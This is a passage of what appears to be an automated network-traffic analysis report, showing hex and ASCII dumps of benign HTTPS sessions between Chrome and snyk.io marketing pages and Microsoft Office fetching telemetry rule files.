                                                                                                                                                                                                                                                                                                              Data Ascii: s a particular risk as AI coding tools speed up velocity and suggest open source modules, but teams are not programmatically validating that suggested open source components are secure.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 49 53 61 4e 54 79 74 78 70 34 37 36 76 62 55 33 7a 5a 65 4d 4e 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 31 2d 32 38 54 31 34 3a 35 39 3a 34 36 2e 35 36 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 32 2d 30 35 54 31 37 3a 33 36 3a 33 39 2e 37 36 37 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"ISaNTytxp476vbU3zZeMN","type":"Entry","createdAt":"2023-11-28T14:59:46.565Z","updatedAt":"2024-02-05T17:36:39.767Z","environment":{"sys":{"id":"master","ty
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8204INData Raw: 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 56 61 6c 75 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 34 35 2e 34 30 22 2c 22 76 61 6c 75 65 22 3a 22 32 34 34 22 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22
                                                                                                                                                                                                                                                                                                              Data Ascii: e":{"sys":{"type":"Link","linkType":"ContentType","id":"contentTextValue"}},"locale":"en-US"},"fields":{"text":"45.40","value":"244"}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3a 34 38 2e 33 32 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 32 2d 30 35 54 31 37 3a 33 36 3a 34 31 2e 30 36 32 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 31 2c 22 72 65 76 69 73 69 6f 6e 22 3a 34 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 56 61 6c 75 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000:48.327Z","updatedAt":"2024-02-05T17:36:41.062Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":11,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentTextValue"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 6e 6b 22 2c 22 6c 69 6e 6b 54 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: nk","linkT
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 36 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 44 61 74 61 73 65 74 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 41 49 20 66 75 72 74 68 65 72 20 65 78 70 6f 73 65 73 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 73 65 63 75 72 69 74 79 5c 22 20 31 2e 36 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ype":"Environment"}},"publishedVersion":6,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentDataset"}},"locale":"en-US"},"fields":{"internalName":"\"AI further exposes open source supply chain security\" 1.6
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 6f 6e 74 65 6e 74 54 65 78 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ontentText
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 53 69 6e 67 6c 65 4c 69 6e 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 4e 6f 74 20 61 70 70 6c 69 63 61 62 6c 65 22 7d 7d 5d 2c 22 64 61 74 61 73 65 74 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 65 77 4a 64 30 45 4c 6f 65 62 33 34 4f 65 55 6e 57 54 6c 47 56 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000SingleLine"}},"locale":"en-US"},"fields":{"text":"Not applicable"}}],"datasets":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6ewJd0ELoeb34OeUnWTlGV","type":"Entry","cr
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8204INData Raw: 65 6c 6d 69 6e 67 6c 79 20 77 6f 72 72 79 20 74 68 61 74 20 41 49 20 63 6f 64 65 20 63 6f 6d 70 6c 65 74 69 6f 6e 20 74 6f 6f 6c 73 20 77 69 6c 6c 20 63 72 65 61 74 65 20 67 72 65 61 74 65 72 20 69 6e 73 65 63 75 72 69 74 79 20 61 6e 64 20 74 68 61 74 20 74 68 65 79 20 77 69 6c 6c 20 62 65 63 6f 6d 65 20 6f 76 65 72 2d 72 65 6c 69 61 6e 74 20 6f 6e 20 74 68 65 20 74 6f 6f 6c 73 2e 20 4c 65 61 72 6e 20 6d 6f 72 65 20 69 6e 20 53 6e 79 6b 27 73 20 32 30 32 33 20 41 49 20 43 6f 64 65 20 53 65 63 75 72 69 74 79 3a 20 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 63 6f 2f 75 67 62 67 57 22 2c 22 63 6f 70 79 4c 69 6e 6b 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 63 6f 2f 75 67 62 67 54 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 74 69 74 6c 65 54
                                                                                                                                                                                                                                                                                                              Data Ascii: elmingly worry that AI code completion tools will create greater insecurity and that they will become over-reliant on the tools. Learn more in Snyk's 2023 AI Code Security: https://snyk.co/ugbgW","copyLinkUrl":"https://snyk.co/ugbgT","appearance":{"titleT


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              127192.168.2.54988813.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 1290ce53-d01e-002b-7905-2225fb000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194914Z-16849878b785jsrm4477mv3ezn000000080g00000000u9gy
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              128192.168.2.54988523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC602OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/events.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC497INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/events
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::tvg8k-1729799354602-dc8648189f41
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799354.1f615e9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              129192.168.2.54989023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC634OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-ambassadors.json?slug=snyk-ambassadors HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ma1xfma3ui1bez"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/[...slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tvg8k-1729799354690-9d46ae9416f8
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799354.1f61604
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC15761INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 45 6d 30 70 33 48 37 4c 47 69 38 59 78 64 66 41 42 46 35 58 50 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 31 30 54 31 38 3a 30 33 3a 33 38 2e 37 38 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 32 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6Em0p3H7LGi8YxdfABF5XP","type":"Entry","createdAt":"2022-11-10T18:03:38.782Z","updatedAt":"2023-06-28T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15984INData Raw: 6e 79 6b 20 74 6f 20 73 68 61 72 65 20 74 68 6f 75 67 68 74 20 6c 65 61 64 65 72 73 68 69 70 20 69 6e 73 69 67 68 74 73 20 26 20 62 65 73 74 20 70 72 61 63 74 69 63 65 73 2e 22 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 7b 7d 7d 5d 7d 5d 7d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 74 65 78 74 47 72 69 64 49 74 65 6d 22 3a 7b 7d 7d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 79 6d 44 6e 6e 38 32 34 4d 66 56 66
                                                                                                                                                                                                                                                                                                              Data Ascii: nyk to share thought leadership insights & best practices.","marks":[],"data":{}}]}]},"appearance":{"textGridItem":{}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"ymDnn824MfVf
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 54 65 78 74 47 72 69 64 49 74 65 6d 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 45 78 63 6c 75 73 69 76 65 20 73 77 61 67 5c 22 20 2d 20 74 65 78 74 20 67 72 69 64 20 69 74 65 6d 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 45 78 63 6c 75 73 69 76 65 20 73 77 61 67 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: e":"ContentType","id":"moleculeTextGridItem"}},"locale":"en-US"},"fields":{"internalName":"\"Exclusive swag\" - text grid item","headline":"Exclusive swag","description":{"nodeType":"document","data":{},"content":[{"nodeType":"paragraph","data":{},"conten
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC1035INData Raw: 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 37 31 37 34 36 31 38 35 36 2f 66 65 61 74 75 72 65 2d 73 6e 79 6b 2d 73 6e 6f 77 66 6c 61 6b 65 2e 6a 70 67 22 2c 22 74 61 67 73 22 3a 6e 75 6c 6c 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 36 34 36 36 32 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 66 6f 72 6d 61 74 22 3a 22 6a 70 67 22 2c 22 68 65 69 67 68 74 22 3a 36 32 38 2c 22 76 65 72 73 69 6f 6e 22 3a 31 37 31 37 34 36 31 38 35 36 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 7d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 66 65 61 74 75 72 65 2d 73 6e 79 6b 2d 73 6e 6f 77 66 6c 61 6b 65 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 34 2d 30 36 2d 30
                                                                                                                                                                                                                                                                                                              Data Ascii: om/snyk/image/upload/v1717461856/feature-snyk-snowflake.jpg","tags":null,"type":"upload","bytes":64662,"width":1200,"format":"jpg","height":628,"version":1717461856,"duration":null,"metadata":{},"public_id":"feature-snyk-snowflake","created_at":"2024-06-0
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12352INData Raw: 30 30 30 30 33 30 33 34 0d 0a 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 67 58 44 6d 57 67 61 58 7a 45 39 34 4c 67 34 74 4e 53 46 4b 4a 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 6d 70 61 6e 79 22 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00003034opdownMenuColumnRowsCollection","items":[{"sys":{"id":"6gXDmWgaXzE94Lg4tNSFKJ","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":"Company","spotlightFirstItem":false,"submenuLinks":{"items":[],"__typename":"NavigationDro
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              130192.168.2.54989113.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: a89f9527-e01e-0033-5af4-244695000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194914Z-15b8d89586fxdh48qknu9dqk2g00000003fg000000008ky3
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
